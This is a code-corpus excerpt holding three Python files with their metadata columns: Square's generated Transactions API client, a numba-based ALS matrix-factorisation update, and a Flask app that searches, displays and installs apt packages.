| 5.807851
| 0.062301
| 0.049476
| 0.058753
| 0.030649
| 0.937006
| 0.928194
| 0.914649
| 0.904633
| 0.862135
| 0.830145
| 0
| 0.014844
| 0.189393
| 56,512
| 1,471
| 5,193
| 38.417403
| 0.782881
| 0.020509
| 0
| 0.683577
| 0
| 0
| 0.241842
| 0.020905
| 0
| 0
| 0
| 0
| 0.048151
| 1
| 0.120378
| false
| 0.003439
| 0.011178
| 0.00172
| 0.203783
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e404ecd1d3050faa39cf19bb31f3d06a11f65007
| 30,048
|
py
|
Python
|
squareconnect/apis/transactions_api.py
|
xethorn/connect-python-sdk
|
a0543b2f7ea498865c6d916de0b10370f89ebc77
|
[
"Apache-2.0"
] | null | null | null |
squareconnect/apis/transactions_api.py
|
xethorn/connect-python-sdk
|
a0543b2f7ea498865c6d916de0b10370f89ebc77
|
[
"Apache-2.0"
] | null | null | null |
squareconnect/apis/transactions_api.py
|
xethorn/connect-python-sdk
|
a0543b2f7ea498865c6d916de0b10370f89ebc77
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Copyright 2017 Square, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class TransactionsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """Bind this API to an ApiClient; reuse (or lazily create) the shared
    client from the global Configuration when none is supplied."""
    config = Configuration()
    if api_client:
        self.api_client = api_client
        return
    # No client supplied: fall back to the configuration-wide singleton,
    # creating it on first use.
    if not config.api_client:
        config.api_client = ApiClient()
    self.api_client = config.api_client
def capture_transaction(self, location_id, transaction_id, **kwargs):
    """
    CaptureTransaction
    Captures a transaction that was created with the [Charge](#endpoint-charge) endpoint with a `delay_capture` value of `true`. See [Delayed capture transactions](/articles/delayed-capture-transactions/) for more information.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.capture_transaction(location_id, transaction_id, callback=callback_function)
    :param callback function: The callback function
    for asynchronous request. (optional)
    :param str location_id: (required)
    :param str transaction_id: (required)
    :return: CaptureTransactionResponse
    If the method is called asynchronously,
    returns the request thread.
    """
    all_params = ['location_id', 'transaction_id']
    all_params.append('callback')
    # Generated code folds **kwargs into the locals() snapshot so that all
    # parameters (positional and keyword) live in one dict; unknown keyword
    # names are rejected up front.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method capture_transaction" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'location_id' is set
    if ('location_id' not in params) or (params['location_id'] is None):
        raise ValueError("Missing the required parameter `location_id` when calling `capture_transaction`")
    # verify the required parameter 'transaction_id' is set
    if ('transaction_id' not in params) or (params['transaction_id'] is None):
        raise ValueError("Missing the required parameter `transaction_id` when calling `capture_transaction`")
    # Endpoint template; `{location_id}`/`{transaction_id}` are substituted
    # by the ApiClient from path_params below.
    resource_path = '/v2/locations/{location_id}/transactions/{transaction_id}/capture'.replace('{format}', 'json')
    path_params = {}
    if 'location_id' in params:
        path_params['location_id'] = params['location_id']
    if 'transaction_id' in params:
        path_params['transaction_id'] = params['transaction_id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])
    # Authentication setting
    auth_settings = ['oauth2']
    # Delegates the actual HTTP POST (and optional async dispatch via
    # `callback`) to the shared ApiClient.
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='CaptureTransactionResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'))
def charge(self, location_id, body, **kwargs):
    """
    Charge

    Charges a card represented by a card nonce or a customer's card on
    file. The request must include either a `card_nonce` (from the
    `SqPaymentForm`) or both `customer_card_id` and `customer_id`.
    Square's processing fee may not be calculated yet when this returns;
    call RetrieveTransaction after ~10 seconds to obtain it.

    Pass a `callback` keyword to execute the request asynchronously; the
    request thread is then returned instead of the response.

    :param str location_id: The ID of the location to associate the created transaction with. (required)
    :param ChargeRequest body: An object containing the fields to POST for the request. (required)
    :param callback: Optional function invoked with the response.
    :return: ChargeResponse, or the request thread when called asynchronously.
    """
    # Reject any keyword argument the endpoint does not understand.
    recognized = {'location_id', 'body', 'callback'}
    for name in kwargs:
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method charge" % name
            )

    # Both positional parameters are required and may not be None.
    if location_id is None:
        raise ValueError("Missing the required parameter `location_id` when calling `charge`")
    if body is None:
        raise ValueError("Missing the required parameter `body` when calling `charge`")

    resource_path = '/v2/locations/{location_id}/transactions'.replace('{format}', 'json')
    path_params = {'location_id': location_id}

    header_params = {}
    # Only send an Accept header when the client selects a non-empty one.
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = \
        self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    {},            # no query parameters
                                    header_params,
                                    body=body,
                                    post_params=[],
                                    files={},
                                    response_type='ChargeResponse',
                                    auth_settings=['oauth2'],
                                    callback=kwargs.get('callback'))
def create_refund(self, location_id, transaction_id, body, **kwargs):
    """
    CreateRefund

    Initiates a refund for a previously charged tender. A refund must be
    issued within 120 days of the associated payment.

    Pass a `callback` keyword to execute the request asynchronously; the
    request thread is then returned instead of the response.

    :param str location_id: The ID of the original transaction's associated location. (required)
    :param str transaction_id: The ID of the original transaction that includes the tender to refund. (required)
    :param CreateRefundRequest body: An object containing the fields to POST for the request. (required)
    :param callback: Optional function invoked with the response.
    :return: CreateRefundResponse, or the request thread when called asynchronously.
    """
    # Reject any keyword argument the endpoint does not understand.
    recognized = {'location_id', 'transaction_id', 'body', 'callback'}
    for name in kwargs:
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_refund" % name
            )

    # All three positional parameters are required and may not be None.
    if location_id is None:
        raise ValueError("Missing the required parameter `location_id` when calling `create_refund`")
    if transaction_id is None:
        raise ValueError("Missing the required parameter `transaction_id` when calling `create_refund`")
    if body is None:
        raise ValueError("Missing the required parameter `body` when calling `create_refund`")

    resource_path = ('/v2/locations/{location_id}/transactions/'
                     '{transaction_id}/refund').replace('{format}', 'json')
    path_params = {'location_id': location_id,
                   'transaction_id': transaction_id}

    header_params = {}
    # Only send an Accept header when the client selects a non-empty one.
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = \
        self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    {},            # no query parameters
                                    header_params,
                                    body=body,
                                    post_params=[],
                                    files={},
                                    response_type='CreateRefundResponse',
                                    auth_settings=['oauth2'],
                                    callback=kwargs.get('callback'))
def list_refunds(self, location_id, **kwargs):
    """
    ListRefunds

    Lists refunds for one of a business's locations. Includes full or
    partial tender refunds processed through Square APIs as well as
    refunds from itemized returns/exchanges in Point of Sale. Refunds
    with a `PENDING` status are not included. Max results per page: 50.

    Pass a `callback` keyword to execute the request asynchronously; the
    request thread is then returned instead of the response.

    :param str location_id: The ID of the location to list refunds for. (required)
    :param str begin_time: Start of the reporting period, RFC 3339. Default: now minus one year.
    :param str end_time: End of the reporting period, RFC 3339. Default: now.
    :param str sort_order: `ASC` (oldest first) or `DESC` (newest first, the default).
    :param str cursor: Pagination cursor from a previous call.
    :param callback: Optional function invoked with the response.
    :return: ListRefundsResponse, or the request thread when called asynchronously.
    """
    optional = ('begin_time', 'end_time', 'sort_order', 'cursor')

    # Reject any keyword argument the endpoint does not understand.
    recognized = set(optional) | {'location_id', 'callback'}
    for name in kwargs:
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_refunds" % name
            )

    if location_id is None:
        raise ValueError("Missing the required parameter `location_id` when calling `list_refunds`")

    resource_path = '/v2/locations/{location_id}/refunds'.replace('{format}', 'json')
    path_params = {'location_id': location_id}
    # Forward only the optional filters that were actually supplied.
    query_params = {name: kwargs[name]
                    for name in optional
                    if kwargs.get(name) is not None}

    header_params = {}
    # Only send an Accept header when the client selects a non-empty one.
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = \
        self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='ListRefundsResponse',
                                    auth_settings=['oauth2'],
                                    callback=kwargs.get('callback'))
def list_transactions(self, location_id, **kwargs):
    """
    ListTransactions

    Lists transactions for a particular location. Transactions include
    payment information from sales and exchanges and refund information
    from returns and exchanges. Max results per page: 50.

    Pass a `callback` keyword to execute the request asynchronously; the
    request thread is then returned instead of the response.

    :param str location_id: The ID of the location to list transactions for. (required)
    :param str begin_time: Start of the reporting period, RFC 3339. Default: now minus one year.
    :param str end_time: End of the reporting period, RFC 3339. Default: now.
    :param str sort_order: `ASC` (oldest first) or `DESC` (newest first, the default).
    :param str cursor: Pagination cursor from a previous call.
    :param callback: Optional function invoked with the response.
    :return: ListTransactionsResponse, or the request thread when called asynchronously.
    """
    optional = ('begin_time', 'end_time', 'sort_order', 'cursor')

    # Reject any keyword argument the endpoint does not understand.
    recognized = set(optional) | {'location_id', 'callback'}
    for name in kwargs:
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_transactions" % name
            )

    if location_id is None:
        raise ValueError("Missing the required parameter `location_id` when calling `list_transactions`")

    resource_path = '/v2/locations/{location_id}/transactions'.replace('{format}', 'json')
    path_params = {'location_id': location_id}
    # Forward only the optional filters that were actually supplied.
    query_params = {name: kwargs[name]
                    for name in optional
                    if kwargs.get(name) is not None}

    header_params = {}
    # Only send an Accept header when the client selects a non-empty one.
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = \
        self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='ListTransactionsResponse',
                                    auth_settings=['oauth2'],
                                    callback=kwargs.get('callback'))
def retrieve_transaction(self, location_id, transaction_id, **kwargs):
    """
    RetrieveTransaction

    Retrieves details for a single transaction.

    Pass a `callback` keyword to execute the request asynchronously; the
    request thread is then returned instead of the response.

    :param str location_id: The ID of the transaction's associated location. (required)
    :param str transaction_id: The ID of the transaction to retrieve. (required)
    :param callback: Optional function invoked with the response.
    :return: RetrieveTransactionResponse, or the request thread when called asynchronously.
    """
    # Reject any keyword argument the endpoint does not understand.
    recognized = {'location_id', 'transaction_id', 'callback'}
    for name in kwargs:
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method retrieve_transaction" % name
            )

    # Both positional parameters are required and may not be None.
    if location_id is None:
        raise ValueError("Missing the required parameter `location_id` when calling `retrieve_transaction`")
    if transaction_id is None:
        raise ValueError("Missing the required parameter `transaction_id` when calling `retrieve_transaction`")

    resource_path = ('/v2/locations/{location_id}/transactions/'
                     '{transaction_id}').replace('{format}', 'json')
    path_params = {'location_id': location_id,
                   'transaction_id': transaction_id}

    header_params = {}
    # Only send an Accept header when the client selects a non-empty one.
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = \
        self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    {},            # no query parameters
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='RetrieveTransactionResponse',
                                    auth_settings=['oauth2'],
                                    callback=kwargs.get('callback'))
def void_transaction(self, location_id, transaction_id, **kwargs):
    """
    VoidTransaction

    Cancels a transaction that was created with the Charge endpoint with
    a `delay_capture` value of `true`.

    Pass a `callback` keyword to execute the request asynchronously; the
    request thread is then returned instead of the response.

    :param str location_id: (required)
    :param str transaction_id: (required)
    :param callback: Optional function invoked with the response.
    :return: VoidTransactionResponse, or the request thread when called asynchronously.
    """
    # Reject any keyword argument the endpoint does not understand.
    recognized = {'location_id', 'transaction_id', 'callback'}
    for name in kwargs:
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method void_transaction" % name
            )

    # Both positional parameters are required and may not be None.
    if location_id is None:
        raise ValueError("Missing the required parameter `location_id` when calling `void_transaction`")
    if transaction_id is None:
        raise ValueError("Missing the required parameter `transaction_id` when calling `void_transaction`")

    resource_path = ('/v2/locations/{location_id}/transactions/'
                     '{transaction_id}/void').replace('{format}', 'json')
    path_params = {'location_id': location_id,
                   'transaction_id': transaction_id}

    header_params = {}
    # Only send an Accept header when the client selects a non-empty one.
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = \
        self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    {},            # no query parameters
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='VoidTransactionResponse',
                                    auth_settings=['oauth2'],
                                    callback=kwargs.get('callback'))
| 45.944954
| 941
| 0.593118
| 3,215
| 30,048
| 5.380093
| 0.107621
| 0.048563
| 0.0259
| 0.022663
| 0.822859
| 0.814881
| 0.810025
| 0.800833
| 0.798
| 0.781234
| 0
| 0.002761
| 0.32498
| 30,048
| 653
| 942
| 46.015314
| 0.850022
| 0.35633
| 0
| 0.809524
| 0
| 0
| 0.213854
| 0.030135
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02381
| false
| 0
| 0.020833
| 0
| 0.068452
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c147d0a00169e651b6eebf456362b088bd44844
| 4,281
|
py
|
Python
|
aarms/models/_symals.py
|
eldrin/aarms
|
bdd5455ac8dcfc1fe91a12fdd132b74e6c37609d
|
[
"MIT"
] | null | null | null |
aarms/models/_symals.py
|
eldrin/aarms
|
bdd5455ac8dcfc1fe91a12fdd132b74e6c37609d
|
[
"MIT"
] | 3
|
2020-11-05T08:44:46.000Z
|
2020-11-10T17:25:15.000Z
|
aarms/models/_symals.py
|
eldrin/aarms
|
bdd5455ac8dcfc1fe91a12fdd132b74e6c37609d
|
[
"MIT"
] | null | null | null |
from scipy import sparse as sp
import numpy as np
import numba as nb
from ._als import (fetch,
partial_wals_npy, partial_wals_cg_npy,
partial_wals, partial_wals_cg)
def update_entity_npy(
    data_x, indices_x, indptr_x,
    data_g, indices_g, indptr_g,
    data_s, indices_s, indptr_s,
    U, P, W_a, W_s, A,
    lmbda_g, lmbda_a, lmbda_s, lmbda,
    is_smp_exp=False, is_smp_exp_g=False,
    solver="cg", cg_steps=5, eps=1e-20,
):
    """Run one pure-NumPy sweep of per-row factor updates over all N rows of U.

    The three (data, indices, indptr) triplets are CSR arrays for the
    interaction matrix X and two side matrices G and S.  Rows are visited in
    random order and each row of ``U`` is updated in place through the
    weighted-ALS helpers imported from ``._als`` -- an exact solve when
    ``solver == "lu"``, conjugate gradient when ``solver == "cg"``.

    NOTE(review): this is the non-jitted twin of :func:`update_entity`; the
    two bodies are kept line-for-line in sync, so changes here should be
    mirrored there.  A ``solver`` value other than "lu"/"cg" silently leaves
    every row untouched -- confirm whether that should raise instead.
    """
    # setup some vars and pre-computation
    N = U.shape[0]
    U_tmp = U.copy()   # frozen copy of U, passed to the solvers alongside the live U
    UU = U.T @ U       # Gram matrices reused by every row update
    PP = P.T @ P
    # prepare some dummies for Y term
    # (the Y interaction is unused here: the -1 flag below disables it;
    #  these 1-element arrays just satisfy the helpers' signatures)
    val_y = np.array([0], dtype=data_x.dtype)
    ind_y = np.array([0], dtype=indices_x.dtype)
    _ = np.array([[0]], dtype=U.dtype) # dummy
    # randomize order
    rnd_idx = np.random.permutation(N)
    # run!
    for n in range(N):
        u = rnd_idx[n]
        # fetch() pulls row u's CSR slice, scaled by the given weight;
        # the third return value flags an empty row.
        val_x, ind_x, skip_x = fetch(u, data_x, indices_x, indptr_x, 1)
        val_g, ind_g, skip_g = fetch(u, data_g, indices_g, indptr_g, lmbda_g)
        val_s, ind_s, skip_s = fetch(u, data_s, indices_s, indptr_s, lmbda_s)
        if skip_x * skip_g * skip_s == 1:
            # all three sources are empty for this row (flags presumably 0/1),
            # so there is nothing to fit
            continue
        if solver == "lu":
            partial_wals_npy(
                u, val_x, ind_x, val_y, ind_y, val_g, ind_g, val_s, ind_s,
                U, U_tmp, _, P, W_a, W_s, A, UU, _, PP,
                -1, lmbda_g, lmbda_a, lmbda_s, lmbda,
                is_smp_exp, False, is_smp_exp_g
            )
        elif solver == "cg":
            partial_wals_cg_npy(
                u, val_x, ind_x, val_y, ind_y, val_g, ind_g, val_s, ind_s,
                U, U_tmp, _, P, W_a, W_s, A, UU, _, PP,
                -1, lmbda_g, lmbda_a, lmbda_s, lmbda,
                is_smp_exp, False, is_smp_exp_g,
                cg_steps=cg_steps, eps=eps,
            )
# Two explicit signatures: a float32 (f4) and a float64 (f8) variant, both
# with int32 CSR index arrays and C-contiguous 2-D factor matrices.
@nb.njit(
    [
        nb.void(
            nb.f4[::1], nb.i4[::1], nb.i4[::1],
            nb.f4[::1], nb.i4[::1], nb.i4[::1],
            nb.f4[::1], nb.i4[::1], nb.i4[::1],
            nb.f4[:,::1], nb.f4[:,::1], nb.f4[:,::1], nb.f4[:,::1], nb.f4[:,::1],
            nb.f4, nb.f4, nb.f4, nb.f4, nb.b1, nb.b1,
            nb.types.unicode_type, nb.i8, nb.f8,
        ),
        nb.void(
            nb.f8[::1], nb.i4[::1], nb.i4[::1],
            nb.f8[::1], nb.i4[::1], nb.i4[::1],
            nb.f8[::1], nb.i4[::1], nb.i4[::1],
            nb.f8[:,::1], nb.f8[:,::1], nb.f8[:,::1], nb.f8[:,::1], nb.f8[:,::1],
            nb.f8, nb.f8, nb.f8, nb.f8, nb.b1, nb.b1,
            nb.types.unicode_type, nb.i8, nb.f8,
        ),
    ],
    nogil=True, parallel=True, cache=True,
)
def update_entity(
    data_x, indices_x, indptr_x,
    data_g, indices_g, indptr_g,
    data_s, indices_s, indptr_s,
    U, P, W_a, W_s, A,
    lmbda_g, lmbda_a, lmbda_s, lmbda,
    is_smp_exp=False, is_smp_exp_g=False,
    solver="cg", cg_steps=5, eps=1e-20,
):
    """Numba-jitted, parallel sweep of per-row factor updates over U.

    Jitted twin of :func:`update_entity_npy`; see that function for the
    parameter description.  The row loop runs under ``nb.prange``; since
    ``rnd_idx`` is a permutation, each parallel iteration writes a distinct
    row ``u`` of ``U`` while reading the shared snapshots ``U_tmp``, ``UU``
    and ``PP`` taken before the sweep.

    NOTE(review): ``ind_y`` is created with ``np.int32`` here but with
    ``indices_x.dtype`` in the npy twin -- equivalent under the i4
    signatures above, but worth unifying.
    """
    # setup some vars and pre-computation
    N = U.shape[0]
    U_tmp = U.copy()   # frozen pre-sweep copy of U, read concurrently by all iterations
    UU = U.T @ U       # Gram matrices reused by every row update
    PP = P.T @ P
    # prepare some dummies for Y term
    # (the Y interaction is disabled via the -1 flag below; these arrays
    #  only satisfy the helpers' signatures)
    val_y = np.array([0], dtype=data_x.dtype)
    ind_y = np.array([0], dtype=np.int32)
    _ = np.array([[0]], dtype=U.dtype) # dummy
    # randomize order
    rnd_idx = np.random.permutation(N)
    # run!
    for n in nb.prange(N):
        u = rnd_idx[n]
        # fetch() pulls row u's CSR slice, scaled by the given weight;
        # the third return value flags an empty row.
        val_x, ind_x, skip_x = fetch(u, data_x, indices_x, indptr_x, 1)
        val_g, ind_g, skip_g = fetch(u, data_g, indices_g, indptr_g, lmbda_g)
        val_s, ind_s, skip_s = fetch(u, data_s, indices_s, indptr_s, lmbda_s)
        if skip_x * skip_g * skip_s == 1:
            # all three sources are empty for this row; nothing to fit
            continue
        if solver == "lu":
            partial_wals(
                u, val_x, ind_x, val_y, ind_y, val_g, ind_g, val_s, ind_s,
                U, U_tmp, _, P, W_a, W_s, A, UU, _, PP,
                -1, lmbda_g, lmbda_a, lmbda_s, lmbda,
                is_smp_exp, False, is_smp_exp_g
            )
        elif solver == "cg":
            partial_wals_cg(
                u, val_x, ind_x, val_y, ind_y, val_g, ind_g, val_s, ind_s,
                U, U_tmp, _, P, W_a, W_s, A, UU, _, PP,
                -1, lmbda_g, lmbda_a, lmbda_s, lmbda,
                is_smp_exp, False, is_smp_exp_g,
                cg_steps=cg_steps, eps=eps,
            )
| 32.18797
| 81
| 0.517636
| 737
| 4,281
| 2.720488
| 0.128901
| 0.041895
| 0.04788
| 0.03591
| 0.879801
| 0.879801
| 0.879801
| 0.86783
| 0.86783
| 0.86783
| 0
| 0.033992
| 0.326559
| 4,281
| 132
| 82
| 32.431818
| 0.661464
| 0.044149
| 0
| 0.72381
| 0
| 0
| 0.002956
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019048
| false
| 0
| 0.038095
| 0
| 0.057143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c3d86aa6a15502abf3071dc0b96b76ad424eebf
| 5,172
|
py
|
Python
|
IXGraphine/dev/web_app/app/home/views.py
|
ix-os/IXOS-utilities-and-extras
|
0ca421e7c387dd2ce829476d4a046e0ac4110e09
|
[
"Apache-2.0"
] | null | null | null |
IXGraphine/dev/web_app/app/home/views.py
|
ix-os/IXOS-utilities-and-extras
|
0ca421e7c387dd2ce829476d4a046e0ac4110e09
|
[
"Apache-2.0"
] | 2
|
2021-10-12T22:46:45.000Z
|
2022-03-25T19:09:53.000Z
|
dev/web_app/app/home/views.py
|
HUSKI3/IXGraphine
|
31bdb22e9e2a6880586eedd09591a62d7ce9aaed
|
[
"Apache-2.0"
] | null | null | null |
from flask import render_template, session, request
from . import home
import os
import subprocess
from wtforms import Form, StringField, SelectField
def _apt_search(term):
    """Run ``apt-cache search <term>`` and return (lines, line_count).

    Output is rendered via ``str(bytes)`` and then split, preserving the
    original pages' quirky formatting (including the leading ``b'``
    artifact) that the templates were written against.
    """
    out = subprocess.Popen(['apt-cache', 'search', term],
                           stdout=subprocess.PIPE,
                           stderr=subprocess.STDOUT)
    stdout, _ = out.communicate()
    lines = str(stdout).replace('\\n', '\n').split(str("\n"))
    return lines, len(lines)


@home.route('/')
def homepage():
    """
    Render the homepage template on the / route with the results of an
    ``apt-cache search crypto`` package listing.
    """
    tag = 'crypto'
    crypto, col = _apt_search('crypto')
    if request.method == "POST":
        # NOTE(review): the '/' route registers only GET by default, so this
        # branch is unreachable unless methods=['POST'] is added to the
        # decorator.  It also re-runs the same hard-coded 'crypto' search
        # instead of searching for the submitted term -- behavior preserved
        # as-is; confirm the original intent.
        searchitem = request.form["appname"]
        session['appname'] = searchitem
        crypto, col = _apt_search('crypto')
        return render_template('page/home/index.html', tag=tag, crypto=crypto,
                               col=col, title="Search Results")
    return render_template('page/home/index.html', tag=tag, crypto=crypto,
                           col=col, title="Home Page")
@home.route('install/<tag>/<appid>')
def install(tag, appid):
    """Install *appid* with apt (output piped to zenity), then render its app page.

    ``appid`` is a "name description..." string taken from the URL, and the
    page "id" is actually the entry's index in the ``apt-cache search``
    output for *tag* (acknowledged by the original author below).
    """
    import shlex  # local import: only needed for shell-escaping here

    print("Installing...")
    # SECURITY: `appid` is untrusted URL input interpolated into a command
    # that must run through a shell (the pipe into zenity requires it).
    # Escape each whitespace-separated token so shell metacharacters cannot
    # inject extra commands; legitimate multi-word appids keep their word
    # boundaries exactly as before.
    safe_appid = " ".join(shlex.quote(part) for part in appid.split(" "))
    cmd = "(sudo apt install " + safe_appid + " -y) | zenity --text-info"
    result = subprocess.check_output(cmd, shell=True)  # raises CalledProcessError on failure
    result = str(result).split(" ")
    # Render the app page for the appid which isn't an id but an index of
    # the search-result list (original author's note).
    print("Install appid:", appid)
    print("Grabbing application list...")
    out = subprocess.Popen(['apt-cache', 'search', str(tag)],
                           stdout=subprocess.PIPE,
                           stderr=subprocess.STDOUT)
    stdout, stderr = out.communicate()
    col = len(str(stdout).replace('\\n', '\n').split(str("\n")))
    crypto = str(stdout).replace('\\n', '\n').split(str("\n"))
    # NOTE(review, from original): this is inefficient and may break if a
    # new application with the tag was added; revisit upon v0.30.
    print("Indexing...")
    # Locate this appid's line in the search output; its list index is the
    # "id" the templates use.
    appname = [s for s in crypto if str(appid.split(" ")[0]) in s]
    index = crypto.index(str(appname[0]))
    print("Got index: ", index)
    print("Building version data...")
    out = subprocess.Popen(['apt-cache', 'policy', str(appid.split(" ")[0])],
                           stdout=subprocess.PIPE,
                           stderr=subprocess.STDOUT)
    stdout, stderr = out.communicate()
    data = str(stdout).replace('\\n', '\n').split(str("\n"))
    version = data
    cmd = str('apt show -a ' + appid.split(" ")[0])
    out = subprocess.Popen(cmd.split(" "),
                           stdout=subprocess.PIPE,
                           stderr=subprocess.STDOUT)
    stdout, stderr = out.communicate()
    data = str(stdout).replace('\\n', '\n').split(str("\n"))
    data.pop(0)  # drop the first line (carries the str(bytes) "b'" artifact)
    sdata = data
    data = [s for s in data if "Description:" in s]
    size = [v for v in sdata if "Installed-Size:" in v]
    return render_template('page/apps/app_page.html', size=size, data=data[0],
                           version=version, appid=appid, index=index,
                           title=str(appid))
@home.route('appinstall/<tag>/<appid>')
def appinstall(tag, appid):
    """
    Render the app page for the appid which isnt an id but an index of the list because im dumb but yeah
    """
    # NOTE(review): near-duplicate of install() minus the `sudo apt install`
    # step; candidate for sharing a helper.  `appid` is a "name description"
    # string from the URL; only its first whitespace token is the package name.
    print("Install appid:",appid)
    print("Grabbing application list...")
    # Search packages by tag; output parsed via str(bytes), which keeps the
    # leading "b'" artifact the templates were written against.
    out = subprocess.Popen(['apt-cache', 'search', str(tag)],
    stdout=subprocess.PIPE,
    stderr=subprocess.STDOUT)
    stdout,stderr = out.communicate()
    col=len(str(stdout).replace('\\n', '\n').split(str("\n")))
    crypto=str(stdout).replace('\\n', '\n').split(str("\n"))
    """
    This is hella inffectient and may break if a new application with the tag was added, update this upon v0.30
    """
    print("Indexing...")
    # Locate this appid's line in the search output; its list index is the
    # "id" the templates use.  IndexError if the package is not found.
    appname = [s for s in crypto if str(appid.split(" ")[0]) in s]
    index = crypto.index(str(appname[0]))
    print("Got index: ",index)
    print("Building version data...")
    # `apt-cache policy <pkg>` output, line-split, is passed whole to the
    # template as `version`.
    out = subprocess.Popen(['apt-cache','policy', str(appid.split(" ")[0])],
    stdout=subprocess.PIPE,
    stderr=subprocess.STDOUT)
    stdout,stderr = out.communicate()
    data=str(stdout).replace('\\n', '\n').split(str("\n"))
    #print(data)
    version = data
    # `apt show -a <pkg>` supplies the Description and Installed-Size lines.
    cmd = str('apt show -a '+appid.split(" ")[0])
    out = subprocess.Popen(cmd.split(" "),
    stdout=subprocess.PIPE,
    stderr=subprocess.STDOUT)
    stdout,stderr = out.communicate()
    data=str(stdout).replace('\\n', '\n').split(str("\n"))
    #print(data)
    data.pop(0)  # drop the first line (carries the str(bytes) "b'" artifact)
    sdata = data
    data = [s for s in data if "Description:" in s]
    size = [v for v in sdata if "Installed-Size:" in v]
    return render_template('page/apps/app_page.html',size=size,tag=tag,data=data[0],version=version,appid=appid,index=index, title=str(appid))
@home.route('/dashboard')
def dashboard():
    """Serve the dashboard page on the /dashboard route."""
    page_title = "Dashboard"
    return render_template('page/home/dashboard.html', title=page_title)
| 40.40625
| 142
| 0.619103
| 690
| 5,172
| 4.627536
| 0.163768
| 0.033824
| 0.060132
| 0.06389
| 0.812402
| 0.803633
| 0.803633
| 0.803633
| 0.803633
| 0.803633
| 0
| 0.004356
| 0.201083
| 5,172
| 127
| 143
| 40.724409
| 0.768393
| 0.062838
| 0
| 0.729167
| 0
| 0
| 0.164071
| 0.025954
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.052083
| 0
